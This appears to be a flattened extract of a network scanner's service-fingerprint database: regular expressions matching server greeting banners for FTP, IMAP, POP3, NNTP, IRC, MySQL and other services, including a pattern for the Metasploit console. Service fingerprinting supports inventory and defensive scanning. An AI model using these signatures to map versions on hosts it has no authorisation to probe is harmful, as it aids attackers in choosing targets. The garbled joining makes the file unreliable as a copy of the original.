ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ 